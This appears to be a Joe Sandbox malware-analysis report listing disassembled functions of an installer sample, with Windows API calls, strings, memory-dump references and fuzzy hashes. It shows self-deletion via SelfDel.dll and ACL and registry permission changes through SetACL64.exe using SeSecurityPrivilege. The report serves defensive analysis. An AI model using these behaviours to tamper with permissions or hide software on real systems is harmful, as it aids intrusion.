Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 00402688
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll
API String ID: 1659193697-4073180849
Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,0042BA48,?,00000800,00000000,?,0042BA48,?,?,Del,?,00000000,00406696,80000002), ref: 0040646B
RegCloseKey.ADVAPI32(?), ref: 00406476

Strings

Del, xrefs: 0040642C

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CloseQueryValue
String ID: Del
API String ID: 3356406503-3562819231
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4

Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(00000000), ref: 00403BB5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4hIPvzV6a2.exe,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 00405E78
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4hIPvzV6a2.exe,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 00405E88

Strings

C:\Users\user\Desktop, xrefs: 00405E72

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Analysis Process: SetACL64.exePID: 2496, Parent PID: 2816COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1736
Total number of Limit Nodes:	56

Executed Functions

Function 00007FF68684BC40 Relevance: 151.2, APIs: 76, Strings: 9, Instructions: 2433COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF68684CF81
GetLastError.KERNEL32 ref: 00007FF68684CF8B
GetAce.ADVAPI32 ref: 00007FF68684CFCA
DeleteAce.ADVAPI32 ref: 00007FF68684CFE4
GetAclInformation.ADVAPI32 ref: 00007FF68684D03D
GetLastError.KERNEL32 ref: 00007FF68684D047
GetLastError.KERNEL32 ref: 00007FF68684D05B
GetAce.ADVAPI32 ref: 00007FF68684D09A
DeleteAce.ADVAPI32 ref: 00007FF68684D0C8
GetAclInformation.ADVAPI32 ref: 00007FF68684D122
GetLastError.KERNEL32 ref: 00007FF68684D12C
GetAce.ADVAPI32 ref: 00007FF68684D16A
DeleteAce.ADVAPI32 ref: 00007FF68684D188
GetAclInformation.ADVAPI32 ref: 00007FF68684D1E5
GetLastError.KERNEL32 ref: 00007FF68684D1EF
GetAce.ADVAPI32 ref: 00007FF68684D22A
DeleteAce.ADVAPI32 ref: 00007FF68684D258
GetAclInformation.ADVAPI32 ref: 00007FF68684D2CD
GetLastError.KERNEL32 ref: 00007FF68684D2D7
GetAce.ADVAPI32 ref: 00007FF68684D30A
DeleteAce.ADVAPI32 ref: 00007FF68684D330
GetAclInformation.ADVAPI32 ref: 00007FF68684D39E
GetLastError.KERNEL32 ref: 00007FF68684D3A8
IsValidSid.ADVAPI32 ref: 00007FF68684BD43

Part of subcall function 00007FF68685EC20: IsValidSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC37
Part of subcall function 00007FF68685EC20: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC44
Part of subcall function 00007FF68685EC20: CopySid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC68

IsValidSid.ADVAPI32 ref: 00007FF68684BD7C
LocalFree.KERNEL32 ref: 00007FF68684E358
LocalFree.KERNEL32 ref: 00007FF68684E368
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E41F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E42B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E431
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E437
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E43D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E443
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E449

Part of subcall function 00007FF68683BF60: GetLastError.KERNEL32 ref: 00007FF68683BFCE

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E44F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E455
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E461
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E467
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E46D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E479
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E47F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E485
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E491
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E497
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E49D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4B5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4CD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4FD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E503
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E509
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E515
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E51B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E521

Strings

Processing ACL of: <, xrefs: 00007FF68684C35C
> failed with: , xrefs: 00007FF68684C8AD, 00007FF68684CB3A, 00007FF68684D9D7, 00007FF68684DCA9, 00007FF68684E0F7
Writing SD to <, xrefs: 00007FF68684E0DD
Omitting ACL of: <, xrefs: 00007FF68684C138
SetEntriesInAcl for DACL of <, xrefs: 00007FF68684D9BF
Reading the SD from <, xrefs: 00007FF68684C893, 00007FF68684CB20
> because a filter keyword matched., xrefs: 00007FF68684C152
SetEntriesInAcl for SACL of <, xrefs: 00007FF68684DC91
Write2SD, xrefs: 00007FF68684C1AF, 00007FF68684C3D8, 00007FF68684C924, 00007FF68684CBB1, 00007FF68684DA4E, 00007FF68684DD20, 00007FF68684E16E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
API String ID: 3366768055-1688761767
Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
Instruction ID: 6d925ab288e5e114c3f70b8b71343917f812444a879e869c0a8dac5510dd36b1
Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
Instruction Fuzzy Hash: 5F33C1B2A18782C5EB208F25D8483FD23A5FF44798F405139DA5D87AE9DF79E984C720

Function 00007FF68684A350 Relevance: 54.2, APIs: 16, Strings: 14, Instructions: 1740registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686860C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686860C35
Part of subcall function 00007FF686860C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF686860C58
Part of subcall function 00007FF686860C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686860CF3

SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF68684B36E
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF68684B461
RegConnectRegistryW.ADVAPI32 ref: 00007FF68684B530
RegOpenKeyExW.KERNELBASE ref: 00007FF68684B57A
RegCreateKeyExW.KERNELBASE ref: 00007FF68684B5D7
RegCloseKey.ADVAPI32 ref: 00007FF68684B66A
RegCloseKey.ADVAPI32 ref: 00007FF68684B68E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684B6FE
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B913
RegCloseKey.ADVAPI32 ref: 00007FF68684B935
RegCloseKey.ADVAPI32 ref: 00007FF68684B9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC33

Strings

hklm, xrefs: 00007FF68684A7D8
Unintentionally the following registry key was created: <, xrefs: 00007FF68684B5E9
hkcr, xrefs: 00007FF68684B012
machine, xrefs: 00007FF68684AA18, 00007FF68684AB7F
current_user, xrefs: 00007FF68684B3F6, 00007FF68684B456
hkey_classes_root, xrefs: 00007FF68684B139
hkey_current_user, xrefs: 00007FF68684B3C9
hkey_local_machine, xrefs: 00007FF68684A8F8
classes_root, xrefs: 00007FF68684B256, 00007FF68684B363
users, xrefs: 00007FF68684AE38, 00007FF68684AF9F
hku, xrefs: 00007FF68684ABF5
hkey_users, xrefs: 00007FF68684AD15
RegKeyFixPathAndOpen, xrefs: 00007FF68684B610
hkcu, xrefs: 00007FF68684B39A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
API String ID: 2754268630-3593729730
Opcode ID: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
Instruction ID: f41443ad83dc2b942af6477adcf1c35fbf48749d131eb586d42823c96d2cc871
Opcode Fuzzy Hash: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
Instruction Fuzzy Hash: C2F2B0A2B09B52C5EB20DB65D4402BD33A5FF84B88F444139DA4D977A9EFBED844C360

Function 00007FF686856B2A Relevance: 39.1, APIs: 21, Strings: 1, Instructions: 609registryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF686856CF4
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF686856D6D
GetLastError.KERNEL32 ref: 00007FF686856D8E
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF686856E07
CloseHandle.KERNEL32 ref: 00007FF686856E30
RegCloseKey.ADVAPI32 ref: 00007FF686856E43
GetNamedSecurityInfoW.ADVAPI32 ref: 00007FF686856F15
MakeAbsoluteSD.ADVAPI32 ref: 00007FF686857021
GetLastError.KERNEL32 ref: 00007FF686857027
GetLastError.KERNEL32 ref: 00007FF686857032
MakeAbsoluteSD.ADVAPI32 ref: 00007FF6868571D8
IsValidSid.ADVAPI32 ref: 00007FF6868571E9
IsValidSid.ADVAPI32 ref: 00007FF68685721B
LocalFree.KERNEL32 ref: 00007FF68685724F
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF68685726F
GetLastError.KERNEL32 ref: 00007FF686857347
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685743A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857440
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857446
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685744C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857452

Strings

SeSecurityPrivilege, xrefs: 00007FF686856B73

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
